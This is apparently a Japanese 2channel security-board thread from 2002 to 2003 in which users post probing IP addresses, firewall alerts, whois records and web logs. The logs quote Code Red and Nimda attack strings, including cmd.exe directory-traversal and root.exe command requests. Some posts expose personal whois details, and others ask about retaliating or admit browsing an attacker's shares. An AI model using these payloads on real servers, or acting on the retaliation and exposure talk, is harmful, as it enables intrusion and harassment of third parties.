Port ServiceName Description State

80 www-http World Wide Web HTTP TCP 接続可
81 hosts2-ns HOSTS2 Name Server TCP 接続可
82 xfer XFER Utility TCP 接続可
83 mit-ml-dev MIT ML Device TCP 接続可
110 pop3 Post Office Protocol - Version 3 TCP 接続可
119 nntp Network News Transfer Protocol TCP 接続可

test

cs81219.pp.htv.fi

Name: cs81219.pp.htv.fi
Address: 212.90.81.219

ちなみにコレ(nslookup cs81219.pp.htv.fi)は正引き

じつは>>152＝いいヤツと見た

218.158.93.105

218.47.201.181
(i201181.ap.plala.or.jp)

これなんとかしてくれ！。侵入野郎・・・・。

Domain Information:
a. [Domain Name] CC22.NE.JP
d. [Network Service Name] Cable City22 Internet
l. [Organization Type] Network Service
m. [Administrative Contact] SF109JP
n. [Technical Contact] SS372JP
p. [Name Server] ns.cc22.ne.jp
p. [Name Server] ns.enjoy.ad.jp
p. [Name Server] ns2.cc22.ne.jp
y. [Reply Mail] [email protected]
y. [Reply Mail] [email protected]
y. [Reply Mail] [email protected]
[State] Connected (2003/01/31)
[Registered Date] 1997/01/24
[Connected Date] 1997/01/27
[Last Update] 2002/03/25 16:25:39 (JST)
[email protected]

これはなんだ？

The firewall has blocked Internet access to your computer
(TCP Port 445) from 0.0.0.0 (TCP Port 2784).

まぁ、ネタだとは思うが･･･誘導

くだらねぇ質問はここに書き込め　Ver2.22
http://pc.2ch.net/test/read.cgi/sec/1034587921/

YahooBB218123214054
YahooBB218123214054
YahooBB218123214054

>>156
それの意味分かって貼り付けてるのか？お前

>>158
ネタじゃないよ。。。とにかくThanks!

IP 65.116.209.154
DNS host-65-116-209-154.day-soulutions.com

南アフリカにもネットができるようだな。

ってゆーか踏み台のＩＰ晒してもあまり意味なくないかい？

>>164
>>139

ある有名株式会社に生IPでアクセスしたら
すぐに不正アクセスを試みられたよ。
炎壁ではじいたけどね。

こんなことしてたら、晒すぞ。

>>166
具体的に何されたのか書けよ…

>>166
pingとかプロキシチェックの類じゃねーだろうな？オイ

AUTHだと思われ。

他に何あったっけ…

209.99.226.172(1690)

>>171
OrgName: Millicom Argentina SA
OrgID: MILC

NetRange: 209.99.224.0 - 209.99.239.255
CIDR: 209.99.224.0/20
NetName: NET-MIC-AR
NetHandle: NET-209-99-224-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.MILLIC.COM.AR
NameServer: DNS2.MILLIC.COM.AR
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-05-02
Updated: 2001-09-06

TechHandle: DL1111-ARIN
TechName: Larranaga, Diego
TechPhone: 5411-4732-8107
TechEmail: [email protected]

# ARIN Whois database, last updated 2002-11-07 19:05
# Enter ? for additional hints on searching ARIN's Whois database.
とでた

>>172
すごいです！ 神と呼ばせてください！

>>173 もっと上手いネタ考えろや

　Λ＿Λ
（−＿−;）

219.22.208.2
こいつ粘着なんですけど、お分かりの人どうですか？

何が？
というか、わかったとしてどうする気？

知ったかが書き込むオナニースレはここですか?

202.29.34.222
ウザイぐらいアタックしてくる

62.195.112.62 - - [10/Nov/2002:23:47:36 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
211.111.102.111 - - [11/Nov/2002:01:17:09 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
61.188.206.165 - - [11/Nov/2002:03:39:42 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
65.101.46.50 - - [11/Nov/2002:05:19:17 +0900] "GET / HTTP/1.1" 400 376 "-" "-"
203.169.174.254 - - [11/Nov/2002:05:25:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
204.152.186.58 - - [11/Nov/2002:05:28:24 +0900] "CONNECT 65.122.104.42:7000 HTTP/1.0" 405 300 "-" "-"
24.141.225.1 - - [11/Nov/2002:05:59:56 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"

煮るなり焼くなりどうぞ。

>>180
スレタイを100回読め。

207.176.215.73

customer-148-223-208-114.uninet.net.mx
こいつは何処だろ？

時間, イベント, 侵入者, カウント
2002/11/16 03:05:41, SMTP port probe, 211.205.165.32, 3
2002/11/16 02:26:56, HTTP port probe, 64.253.228.125, 1
2002/11/15 23:53:52, RPC TCP port probe, 202.102.4.38, 1
2002/11/15 23:17:38, SQL port probe, 210.52.223.4, 3
2002/11/15 23:15:29, HTTP port probe, ART.xxx.or.jp, 2
2002/11/15 16:54:34, NetBIOS port probe, host130-144.pool14416.interbusiness.it, 2
2002/11/15 14:33:27, SQL port probe, 194.200.201.56, 3
2002/11/15 14:21:41, TCP port probe, 203.152.26.170, 2
2002/11/15 13:20:09, HTTP port probe, 211.217.208.111, 3
2002/11/15 06:41:12, SMTP port probe, pcp02801511pcs.catonv01.md.comcast.net, 2
2002/11/15 05:51:14, SMTP port probe, 61.61.68.72, 1
2002/11/15 04:57:05, HTTP port probe, 61.144.18.2, 3
2002/11/15 04:10:56, FTP port probe, 203.194.195.173, 2

ART.xxx.or.jp・・・

ひょっとして俺は踏み台にされているのか？
ルータの通信情報ログに現在確認できるだけで９０件もこんなのがあります。

2002/11/16 08:07:15 NAT RX Not Found : UDP 172.26.34.200 : 16432 > 172.26.152.179 : 6970 (IP-PORT=7)

>>184
早とちりはイカン

侵入者のIPアドレス: 200.204.78.230
侵入者のMACアドレス: 0004AC389F41
DNSの逆引き: 200-204-78-230.its.org.br
NetBIOS名: IS~ITSERVER
Node: ITSERVER
Group: ITS

発信元Port番号: 0
宛先Port番号: 0
攻撃の種類: SYN Flooding
カウント: 72
カウント(延べ): 286

発信元Port番号: 4366
宛先Port番号: 1433
攻撃の種類: SQL Port Probe
カウント: 39
カウント(延べ): 138

発信元Port番号: 3581
宛先Port番号: 137
攻撃の種類: Ping of Death
カウント: 18
カウント(延べ): 122

延々と繰り返してる。何なんだこの馬鹿は。

>>187
よかったな

fwisp12-ext-y.docomo.ne.jp DoCoMo/1.0/SO503i/c10

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
は面白い

>>162
に８連射された。なんなの？　意味そのものがわからん。
SYGATEが防いだけど、どんな種類の攻撃なんだろう？
TCPで表示があった。TCPの意味もわからんが、多分、東京のどこか？だと思う。

tcrc.edu.tw (Taiwan)

The domain that you requested, tcrc.edu.tw, has already been registered by the organization below. Please click here to see other options for this name.

Ministry of Education Computer Center
12th Fl, 106, Hoping E. Road, Sec 2.
Taiwan Republic of China, R.O.C
TW

Domain Name: edu.tw

Contact:
TANet, Administrator [email protected]
886-2-27377010-295

whoisうざい

>>191
TCPの意味くらい分かれ。馬鹿が。

IP:24.169.144.135
DNS:hvc-24-169-144-135.hvc.rr.com

>>191-192
低レベルなおまえらが使うソフトじゃないんだよ。アンイスコしろ。

a. [IPネットワークアドレス] 202.244.160.0-202.244.191.0
b. [ネットワーク名] GRASS-NET
f. [組織名] 倉敷芸術科学大学

Time, Intruder, Event, Count
2002/09/27 21:35:05, 61.194.8.76, DNS TCP port probe, 4
2002/09/28 13:27:22, 210.112.133.155, SQL port probe, 2
2002/10/11 18:32:19, 61.240.177.14, HTTP port probe, 2
2002/10/11 22:51:26, 218.15.225.216, HTTP port probe, 3
2002/10/13 13:19:37, 61.149.8.141, HTTP port probe, 1
2002/11/05 17:07:45, 61.149.1.4, HTTP port probe, 1
2002/11/13 15:20:00, 192.168.1.1, UDP port probe, 2
2002/11/15 14:53:11, j191151.ap.plala.or.jp, IP last fragment length changed, 4
2002/11/15 14:56:18, j191151.ap.plala.or.jp, IP last fragment length changed, 4
2002/11/18 21:25:09, 202.244.174.220, DNS name overflow contains %, 2
2002/11/18 21:25:26, 202.244.174.220, DNS name overflow, 4
2002/11/18 21:25:40, 202.244.174.220, DNS non-Internet lookup, 17

c-66-176-160-241.se.client2.attbi.com
しし座流星を観に逝っている間だった
1個しか観られんかったが‥

ポート32968って何？？？　210.147.253.195から来たが・・・

>>199
Commonly Used Ethernet Protocol Types
32968 Intergraph Corporation

210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP)
２ちゃんにいくと上記のプログラムが個人IP宛に送られる
しくみになってます！

ふーん
210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP).exe
なんてプログラムあるんだ？へー


ﾌﾟ

>>202
ファイル名に使えない文字は使用されてないからあっても不思議じゃないが、何か?

>>203=201
はいはい、ネタは他の板でやれ。

219.191.240.74

うざい。毎日数十回アタックしてくる。
こいつ何者ですか？

曲者
巻者
ものみんた

ここ三日で攻撃してきた糞ドモのIPをいいます。
ノートン先生が反応しまくってんだYO!!
218.222.107.207
218.47.88.99
210.170.243.13
218.42.99.253
61.213.92.52
219.160.255.101

また続き
219.106.29.120
219.108.228.45
218.47.207.21
202.232.95.174
210.238.168.86
210.147.233.171
220.36.100.94
218.42.99.253
61.214.22.161
218.224.185.231
210.254.2.66
61.197.62.155
218.142.168.14
61.125.251.98
61.117.78.134
218.42.100.232

またまた続き

218.217.175.153
202.232.95.112
210.159.215.113
165.76.178.170
219.111.105.112
219.98.249.204
219.111.105.112
211.132.18.47
218.47.23.164
219.104.182.84
61.115.100.58
219.104.137.204
219.160.245.47
61.214.22.161
61.197.62.155
165.76.252.162
218.43.141.91
210.130.186.31
61.210.26.155 以上

1.1.1.1
これって・・・？

>>207-209
既にIPアドレスが変わっていて無関係の人を巻き込む罠。
馬鹿は氏ね。

さっき24.88.47.53からトロイの木馬Backdoor/SubSeven来た。
しかもこのIP、13日にもBackdoor/SubSevenで攻撃にきてる。
日付が変わっても同じ所から同じ手口ってことは同一人物って事？

>>207-210
ノートンが防いだんじゃIPSpoofされて無いかわからないだろうがヴォケ。
晒したかったらTCP接続を確立させてからにすることだ。
こんなこと書いても、お前の知能じゃ何を言っているかわからないだろうから、わかるように超訳してやる。

素人は帰れ、二度と来るな。

>>213
同

>>212
>しかもこのIP
恥ずかしいからIPIP言うな馬鹿

得意げに「最近うちの鯖にアタックくんのがウゼェよ」とか言ってそうだな
こいつら・・
スキャニングでいちいち騒ぐなシロウトども。
されるのが嫌ならネットワークから切り離せよ。

ムハー駄目だ駄目だ。あんまり馬鹿すぎて罵らずにはいられない。
>>207〜209
>ここ三日で攻撃してきた糞ドモのIPをいいます。
>ノートン先生が反応しまくってんだYO!!
lol
あんた、プールアドレスって知ってマスカ？
なんというかスキャンしてきたアドレス晒す神経が信じられん。
ご丁寧に全部掲載ですか（＞＜
あんたの師匠のノートン大先生がウルサイんだったら、
ボロPC買ってきてFWに仕立ててフィルタすりゃあいい。
ログの出力も閾値とか考えてさ・・
手作業で構築していくうちに少しはIP通信を理解していくんじゃないかね。

連続投稿ゴメン

でも、ここに書いてる人らの話みてると、自らもNetbiosブロードキャスト
ばらまいてそうな感じ。フィルタしといてね。
http://www.rtpro.yamaha.co.jp/RT/FAQ/IP-Filter/NetBIOS-Filter.html

>219.191.240.74

ヤフーのユーザーです。

ntgifu004236.gifu.nt.isdn.ppp.infoweb.ne.jp

inetnum: 211.90.0.0 - 211.91.255.255
netname: UNICOM
country: CN
descr: China United Telecommunications Corporation
admin-c: UCH1-AP
tech-c: UC6-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20020917
mnt-by: MAINT-CNNIC-AP
source: APNIC

role: Unicom China Hostmaster
address: 911 Room,Xin Tong Center,No.8 Beijing Railway Station
address: East Avenue, Beijing,PRC.
country: CN
phone: +86-10-6527-8866
fax-no: +86-10-6526-0124
e-mail: [email protected]

>>219
っで、何が言いたいの?

>>220
自分の低脳ぶりを誰かにわかって欲しいんじゃない?

>[17098-7]
>投稿者：[sniper] 　投稿日：[2002年11月25日(月) 10:51:53]
>私の親友は、ある人の職業・本名しっかり調べたよ（笑）
>そして現在居住地も‥‥‥

>[17110-7]
>投稿者：[sniper] 　投稿日：[2002年11月25日(月) 10:51:53]
>串屋の83の亡霊
>なぜそれほど気になる？

>串屋に教えると思っているのか？ア・マ・イ
>そんな間がらじゃないないよ

>キミの妄想癖で推測したらどうかな？

>異常な粘着質
>執拗なぶら下がり
>オートリバースな会話
>ボキャ貧
>検索魔

>これがキミの印象だ

http://www.makiko.gr.jp/cgi-bin/bbs.cgi

219.106.116.162

inetnum: 219.106.0.0 - 219.106.127.255
netname: SANNET
descr: SANYO Electric Software Co., Ltd.

>>223
馬鹿は死ね

165.76.253.174
こいつさっきから攻撃しまくってきてる。（今も攻撃してきてる
めっちゃうざい

言い忘れましたが約三十秒に一回で攻撃してきています。

>>226
馬鹿は死ね

174.pool5.dsl8mtokyo.att

>>227
それしか言えないお前が死ね

自分がアタックされているのはどこでみるのですか？
当方セキュリティソフトなにもいれてません。
もうばんばん攻撃とかされてり盗まれたりしてるんですかね？

>>230
つか、迷い人発見。
よーわからんのなら、とりあえずルーター入れて、パソにプライベートIPアドレス割り当てて下され。

http://pc.2ch.net/test/read.cgi/sec/1035688068/
http://pc.2ch.net/test/read.cgi/sec/1033726535/

１時間３０分程前、多分中国からだと思いますがport probeがありましたので
お知らせします、今現在ネットから繋がりますので興味がある方は法律に触れない
よう気をつけて調査して下さい。

IP:202.101.212.139
Node: A
NetBIOS: IS~A
Group: WORKGROUP
MAC: 00E04C00003F
共有ネットワーク:12(PC)

どうも、学校もしくは
会社から不正アクセスしているようですが、こちらから侵入できる
ところをみると、ＭＳ修正パッチをあてていないようです。
ただ、１２フォルダ内のemlのファイルはあきらかにnimda32ウィルスを
検知しており極めて危険な存在です。

ウィルスを蔓延させる可能性もあるので皆さん注意して下さい。

>>232
ウイルスの感染活動を、不正アクセスって一括りにまとめてまうのは、いかがなものかと。

>>232
ﾊｧ?一々上げんな。

>>233-234
ただ、12PC上の2emlのファイルが同じnimda32ウィルス感染ファイルを保存しているひとも、
おかしいですよ！
容量もかるく５〜９MB以上あるメールですよ！！
普通の人じゃないです。

>>235
超マジレスですが。
それを確かめに逝ったって時点で、広義での不正アクセスっす、君って。

放置でええやん、そんなの。

中国（中華人民今日は酷）で違法コピーが蔓延していますが、
ウィルス、とくに Redlof に感染しまくりの公司やなにやら、
いっぱいありぃーのがありますので、ご注意を…

>>231
ゾーンアラームってのをいれてみました。
ありがとうございます。

まあ、ことこの手のスレに「報復」しに来る輩の件に関しては
小学生を相手に話をしているのと同様に考えたほうが良いかと。

n238155.ap.plala.or.jp

中国からハッキングされそうになった・・・
http://whois.ansi.co.jp/?key=211.248.32.5

http://www.agemasukudasai.com/bloom/

pc15162.amigo2.ne.jp
ntgifu006024.gifu.nt.isdn.ppp.infoweb.ne.jp

相変わらず、このスレは馬鹿が大暴れしてるな。
scanぐらいでぎゃーぎゃーさわいでんじゃねぇよ。ボケども。

Registrant:
Shigeru Kanemoto
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan

Registrar: Dotster (http://www.dotster.com)
Domain Name: PPONA.COM
Created on: 20-MAR-01
Expires on: 20-MAR-04
Last Updated on: 29-JUN-02

Administrative Contact:
Kanemoto, Shigeru [email protected]
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551

Technical Contact:
Kanemoto, Shigeru [email protected]
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551

61.120.31.161
これ串ですかね？

>>244 の居住地判明
http://www.data.kishou.go.jp/marine/wave/obsdata/eqm/936.jpg

↑5点だ、5点

>>244
馬鹿が大暴れしてるカキコしか反応しないボケです。

http://www.geocities.co.jp/Bookend-Christie/7720/

自分のホームです遊びに来てみろごらぁ

此処でスプーイングの偽装を勉強汁
http://www.toyo.co.jp/security/ice/advice/Underground/Hacking/Methods/Technical/Spoofing/default.htm
インターネットセキュリティーの会社だyo

偽造したアドレスで広域にスキャンする。
偽造アドレスとスキャンしたアドレスの対応とっとけば馬鹿が何処にいるかわかるな。(w

>>244
じゃぁ、スキャンするなよｗ

>>253
はぁ? してねぇよ。
お前の頭おかしいんじゃねぇか?
一回死んでこい。

>>254
それはどうかな？

>>255
わけわかんね。
余裕こいてんじゃねぇよ。
お前も死ねよ。ばーか。

Time, Intruder, Event, Count
2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1
2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1
2002/12/07 218.124.46.61, DNS name overflow, 1

>>252
バカに教えてクレイ。
偽装IPでスキャンした場合、スキャン結果は偽装IP先へ届かないか？

>>258 届く。

>>259
センクス。ってことは、
　【攻撃したヤシのPCには届かない　＝　クラッカーに情報が届かない】
じゃん？
結果が届かなければ、スキャンの意味ないのでは。
DOS系やflood系などなら偽装の意味もわかるのだが。

SRC xx.xx.0.0 - xx.xx.255.254
DST yy.yy.0.0 - yy.yy.255.254
でスキャンするだろ。んでもって馬鹿がxx.xx.100.100から攻撃されたと騒いだら
馬鹿のIPアドレスはyy.yy.100.100って事じゃねいかい。

なるほろ。

　　　　【　　納　　得　　】


>>252の意味がワカタヨヽ（´ー｀）ﾉ

257のは、それで何が分かりますか？

ここのyulibu-311(推定20後半〜30代のババア) metalsilver00(20代後半の自称有名企業の干され組)の書き込みはあまりにアホすぎ(藁)
天誅いっちゃう？うははははは。

http://www.excite.co.jp/bbs/personal/ma/thread?t=43717

>>264 ﾈﾄｦﾁ板逝け

>>263
キミが257によって把握できた情報を書いてミソ

2002/12/08 09:10:17 IP_Filter REJECT UDP 192.168.1.2:137 > 192.168.1.255:137 (IP-PORT=0)

この同一IPのログが立て続けに昨日から200件あります。
接続を一旦切って繋げ直してもまた出ます。
これは一体なんでしょうか？

>>267
ローカルホストだからあなたのパソコン。

６分間で４回続けて。
なんか怖いなー。

64.71.177.66

↑さっきみたら更に２回…
((；ﾟДﾟ)ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>270
そんなん普通だろ？

192.116.231.167 うざい！
こいつを懲らしめる方法を教えてください

74 ：無名さん ：02/12/01 23:30
↑オマエは頭の悪いバンドマンだなーどうせオールナイトイベントに出てた
スキムミルクっていうバンドだろ？ライブ中の態度でけーんだよ。
ツアーバンドはノルマとらないんだよ。それからいい音出すPAも雇ってチラシも
すってんだよ。金かかってるんだよ。そのくせてめえら客よばね―のか？
Y野氏の組織はやばいからねーパソコンオタクもいるから調べられて
そんな事言ってるとCHOKOに本当にカツアゲされるぞ。
２ちゃんねるキラー組織って知ってるかなー君？
http://music.2ch.net/test/read.cgi/minor/1031619119/74

136 ：無名さん ：02/12/10 11:22
>>101
その話知ってるよ。「CHOKOのメンバー連れて来い」って言ってたよね。
あんまり詳しく書くと2ちゃんねるキラー組織にやられそうなんで
書けないけどね。
　結局74＝Y野って事でよろしいですか？
http://music.2ch.net/test/read.cgi/minor/1031619119/136

2ちゃんねるキラー組織ｷﾀ━━━）ﾟ∀‘）･ω･） ﾟДﾟ）ﾟ∀ﾟ）･∀･）￣ー￣）´＿ゝ‘）-＿）ﾟ∋ﾟ）´Д｀）･∀。）━━━━!!

このスレには2ｃｈキラー組織とやらを知っているものが潜んでいるらしい。
今後祭りになるかならないかは今後の動向次第。
興味のあるものは、そいつらに追求をして白状させよう。

関連スレ
CHOKO統一ｽﾚ
http://music.2ch.net/test/read.cgi/minor/1031619119/
CHOKOというバンドのサイト
http://choko3.hp.infoseek.co.jp/
矢野的思考
http://www.seicion.ne.jp/sr_diarys/564CHOKO/

>>272
お前のローカルホストだから、自分でやれ。

>> 274
ちゃうよー。
アドレスから検索すればわかるが、これはイタリアからのアタックです。

>>275
it と　il を見間違えてるよな？

il　→　イスラエル

>>275
＞この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
＞様々なネット上の危険からの防御法や対策を語りあうための板です。
＞掲示板の荒らし方や侵入の方法、メールボムの送り方等、
＞攻撃方法の質問はご遠慮下さい。
＞2ちゃんねるでは荒らし依頼は出来ません。
＞また、この板ではアタック依頼は受け付けません。
＞ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

うおぉぉぉりゃぁぁぁーーーー
62.139.254.116

こいつ国内の nimuda でやがんの。まだこんな奴いるとはね
[Thu Nov 21 18:12:00 2002] [error] [client 61.213.242.130] File does not exist:
/xxx/xxx/htdocs/scripts/root.exe

>>279 nimudaってあんた..

iplog[19100]: TCP: port scan detected [port 443] from 62.79.111.26 [ports 49939,49941,49942,49967,49970,...]

ところでこういう方にはどうしてますか？
やり返すとか？どうやり返せと？
方法ｷﾎﾞﾝﾇ

80.117.33.195:23319
イタリア人まじうぜー

i031252.ap.plala.or.jp

dsl081-127-201.dfw1.dsl.speakeasy.net
妙なＴＣＰポートで漏れのＰＣから発信・・・

[email protected]

ポート1433に211.186.130.98から。ウザー

217.84.253.142:33441 (pD954FD8E.dip.t-dialin.net) ポート 2402 (TCP)
今日に入ってから延々と30回のアタックが続いている。繋ぎ直しても同じ。
ファイアーウォール入れて以来、ここまでしつこいのは初めて。

50回に達する前に回線切ってメシ食って、
繋ぎなおしたら止まってますた。

なんか、ポート４４３をやたらスキャンしてくるから、
サイト見に行ってみたらここだった。
↓
http://rome.tanaka.giti.waseda.ac.jp

通信リサーチセンターとか書いてあるけど、人のﾒﾙﾎﾟﾄスキャンして
いったいなにをしようというのか・・・。
名前も大学名も思いっきり入ってるし。

>>289
そういうこと書けば書くほど
その機関ではなく>>289自体の無知さ加減があらわになるんだが。

>>290
どういう意味？ｵｾｰﾃ。

あげ

４４５とかつつかれるとちょっとびびるね。
心臓に悪いからやめてくれ。
でも80とかくるのはなんだろう？ほむぺと間違えてるのか？

メッセンジャー、ファイヤーウォールでカットするとすごいことになるよ。
60回とか平気でトライしようとするもん。そんなしつこくしなくても･･

[11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282
[11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282
[11/Dec/2002: +0900] "GET / HTTP/1.1" 200 4306
[11/Dec/2002: +0900] "GET /icons/blank.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/folder.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/image2.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/text.gif HTTP/1.1" 304 -

コレって何しようとしてたの？
ずっと見てて不思議に思ったんだけど。意図がよくわからん。
一応侵入者のログです。

侵入者つうかハッカーって誰のＰＣにも攻撃してくるんですか！？
このｽﾚ見てるとみんな実は被害にあってるのかなぁっと思ったりします。

>>295
99%ゴミバケツかネットワーク設定者のミスです

>>294
見たままだ。そのまま理解しれ。わからなくても気にするな。弾いたんだろ？

>>295
大部分の人がファイヤーウォールで防いでいると思うよ。
もれは２日前に導入したばかりのZoneAlarmが334回も防いでいるよ。
うち30回は危険なアクセスだとよ。

ﾀﾞｲﾔﾙｱｯﾌﾟのIPアドレスだと地域を特定されませんか？

>>299
IPアドレスから地域を特定できたら神。

>>299は数人しかインターネットユーザがいないような過疎地域に住んでるのか?
それなら困るだろうな。

>>300
ですよね！
PC初心者板では出来るって言ってる人が何人も・・・

>>294 apacheを下手くそにインストールしてると/iconsが
外からもアクセスできるという罠。

>>301
東京ですが何か？

>>300
じゃあ、ｱｸｾｽポイントを変えるだけで2chのｽﾚが立て放題ってのも嘘ですよねぇ？

奥多摩

マジレス下さい。

あとPC番号から同一人物を見抜くって言うけど、あれは荒らしに対する脅しですよね？

　　・えさを与えないでください

>>299 南鳥島とか… (w
FQDNから地域が推測できるISPも存在する。
tracerouteかければルータのFQDNから推測できる場合もある。

>>299
もし、キミがダイアルアップで接続してるのなら、名前に
fusianasan
と入れて再度書きこみを見てみれば？

そこに***TKY***とか出れば東京だとわかる。
***.***.***.***の数字だけなら、プロバイダ所在地ぐらいはワカルかも。

>>309
す、スマン・・・そういうことだったのか。

>>311
***.***.***.***ってマニアックなプロバイダでしょ？

このスレはIP厨の掃き溜めだから活用されると困るんだよね。
機能すると困るスレ。変なスレだ。

あと質問は初級ネットかPC初心者でやれ。
このスレに書きこみに来る時点で基礎知識が無い。

>もし、キミがダイアルアップで接続してるのなら、名前に
>fusianasan
>と入れて再度書きこみを見てみれば？

これは何でﾀﾞｲﾔﾙｱｯﾌﾟならってなってるんですか？
ADSLだといけないんですか？
教えて下さい、この通りです！m(_ _)m

有効活用しつつ埋め立てちまおう。

ADSLでIPアドレス晒すとマズイの？

[email protected]
こいつどうよ

9 14 ms 14 ms <10 ms 210.163.230.106
10 14 ms 13 ms 14 ms gsr-otee4.kddnet.ad.jp [203.181.97.217]
11 14 ms <10 ms 13 ms otergs002.kddnet.ad.jp [203.181.97.198]
12 <10 ms 14 ms 14 ms oteGW04.v4.kddi.ne.jp [203.140.128.90]
13 13 ms 14 ms 14 ms tkyCORE02.v4.kddi.ne.jp [210.238.128.221]
14 14 ms 14 ms <10 ms tky3CORE02.v4.kddi.ne.jp [210.238.128.58]
15 14 ms 28 ms 13 ms ngnRT04.v4.kddi.ne.jp [218.222.0.134]
13,14,15あたりから東京という事が推測できるけど、それで困るのか?

>>314,316
ラジャ♥

>>319は>>299へのレスだ。
あとIP言うな!!

>>321
実は東京ではありません。ｽﾏｿ

僕が某ｻｲﾄでアク禁になったとき、dionユーザー全員がアク禁になるのか知りたかったんです。

>>319 15は長野かも

>>323
違います

プロバイダから先のｱｸｾｽポイントまでは辿れないんですよね？少なくともdionは
そもそもﾀﾞｲﾔﾙｱｯﾌﾟってｱｸｾｽポイントとかないよね？

61.213.136.18
sip1-18.dsnw.ne.jp
こいつしつこすぎ。
なんなの？もう50回くらいあたっくしてきてるよ。

本日たった今、
207.33.111.37
からＷｅＬＬノートンポートを全て総ｽｷｬｿされました

>>326-327
だからどうしたって言うんだ。

>>328
スレタイをよく読め

まあ、ＷｅＬＬノートンポートだからな。仕方ない。

スプーフィングて知ってるか？

>>327
>>1はTCP確立させて晒しているぞ。お前はそれをしていない。
この意味がわからないんだろうな。馬鹿だから。

>>332
よくみて味噌。ノートンポートだよ。　エサじゃないの？

5 ：J053224.ppp.dion.ne.jp ：02/12/15 10:40 ID:Hl/DvHL1







http://freeweb2.kakiko.com/dengeki/indexs.htm

slip-12-65-120-92.mis.prserv.net

219.145.190.120 - - [13/Jan/2003:20:23:11 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-"
219.68.11.114 - - [12/Jan/2003:18:52:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-"

あのさ、これって異常じゃねえ？時間がＧＭＴね。
2003-01-13 08:40:46 80.130.182.226 HEAD /index.asp 200
2003-01-13 08:40:49 80.130.182.226 HEAD /root.exe 404
2003-01-13 08:40:52 80.130.182.226 HEAD /scripts/root.exe 404
2003-01-13 08:40:55 80.130.182.226 HEAD /msadc/root.exe 404
2003-01-13 08:40:59 80.130.182.226 HEAD /wwwroot/root.exe 404
2003-01-13 08:41:02 80.130.182.226 HEAD /images/root.exe 404
2003-01-13 08:41:05 80.130.182.226 HEAD /samples/root.exe 404
2003-01-13 08:41:08 80.130.182.226 HEAD /iissamples/root.exe 404
2003-01-13 08:41:11 80.130.182.226 HEAD /adsamples/root.exe 404
2003-01-13 08:41:14 80.130.182.226 HEAD /cgi-bin/root.exe 404

2003-01-13 08:41:17 80.130.182.226 HEAD /iisadmpwd/root.exe 404
2003-01-13 08:41:20 80.130.182.226 HEAD /cmd1.exe 404
2003-01-13 08:41:24 80.130.182.226 HEAD /scripts/cmd1.exe 404
2003-01-13 08:41:26 80.130.182.226 HEAD /msadc/cmd1.exe 404
2003-01-13 08:41:29 80.130.182.226 HEAD /wwwroot/cmd1.exe 404
2003-01-13 08:41:35 80.130.182.226 HEAD /images/cmd1.exe 404
2003-01-13 08:41:38 80.130.182.226 HEAD /samples/cmd1.exe 404
2003-01-13 08:41:41 80.130.182.226 HEAD /iissamples/cmd1.exe 404
2003-01-13 08:41:44 80.130.182.226 HEAD /adsamples/cmd1.exe 404
2003-01-13 08:41:47 80.130.182.226 HEAD /cgi-bin/cmd1.exe 404

2003-01-13 08:41:50 80.130.182.226 HEAD /iisadmpwd/cmd1.exe 404
2003-01-13 08:41:57 80.130.182.226 HEAD /scripts/shell.exe 404
2003-01-13 08:42:01 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:07 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:10 80.130.182.226 HEAD /scripts/..ﾁ../winnt/system32/cmd.exe 500
2003-01-13 08:42:13 80.130.182.226 HEAD /scripts/..ﾀ%9v../winnt/system32/cmd.exe 500
2003-01-13 08:42:16 80.130.182.226 HEAD /scripts/..ﾀ%qf../winnt/system32/cmd.exe 500
2003-01-13 08:42:19 80.130.182.226 HEAD /scripts/..ﾁ%8s../winnt/system32/cmd.exe 500
2003-01-13 08:42:22 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:25 80.130.182.226 HEAD /scripts/..ﾁ%pc../winnt/system32/cmd.exe 500

2003-01-13 08:42:28 80.130.182.226 HEAD /scripts/..o../winnt/system32/cmd.exe 404
2003-01-13 08:42:31 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404
2003-01-13 08:42:35 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
